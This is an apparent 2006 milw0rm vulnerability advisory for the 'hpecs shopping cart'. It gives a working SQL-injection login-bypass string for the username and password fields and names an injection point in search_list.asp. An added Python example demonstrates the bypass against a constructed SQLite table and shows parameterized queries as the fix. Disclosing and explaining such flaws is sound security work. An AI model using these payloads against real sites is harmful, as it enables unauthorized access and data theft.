vendor site: http://hpe.net/
product: hpecs shopping cart
bug: SQL injection
risk: high

login bypass:
username: 'or''='
passwd: 'or''='

SQL injection (POST):

http://site.com/search_list.asp
variables:
Hpecs_Find=maingroup&searchstring='[sql]
( or just post your query in the search engine ... )
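
Why the 'or''=' string above passes a login check, and the fix, as an added example that is not the product's code (the advisory does not show it). It assumes the login page builds its query by string concatenation; the table, column and function names are hypothetical, the data is constructed, and SQLite stands in for the product's database.

```python
import sqlite3

def make_db():
    # Constructed sample data; schema names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def build_concat_query(username, passwd):
    # Assumed vulnerable pattern: form input pasted into the SQL text.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND passwd = '" + passwd + "'")

def login_concat(db, username, passwd):
    # True when the concatenated query returns any row.
    row = db.execute(build_concat_query(username, passwd)).fetchone()
    return row is not None

def login_param(db, username, passwd):
    # Hardened form: placeholders keep the input as data, so quotes in it
    # are compared literally and never parsed as SQL syntax.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND passwd = ?",
        (username, passwd)).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    probe = "'or''='"  # the string given in the advisory
    # The input's quotes re-balance the literals, leaving
    #   username = '' or '' = '' AND passwd = '' or '' = ''
    # and the trailing "or '' = ''" makes the WHERE clause always true.
    print(build_concat_query(probe, probe))
    print("concatenated:", login_concat(db, probe, probe))
    print("parameterized:", login_param(db, probe, probe))
    print("valid login:", login_param(db, "admin", "s3cret-constructed"))
```

The same placeholder binding applies to the searchstring parameter of search_list.asp; in classic ASP the equivalent is an ADODB.Command with bound parameters.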

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]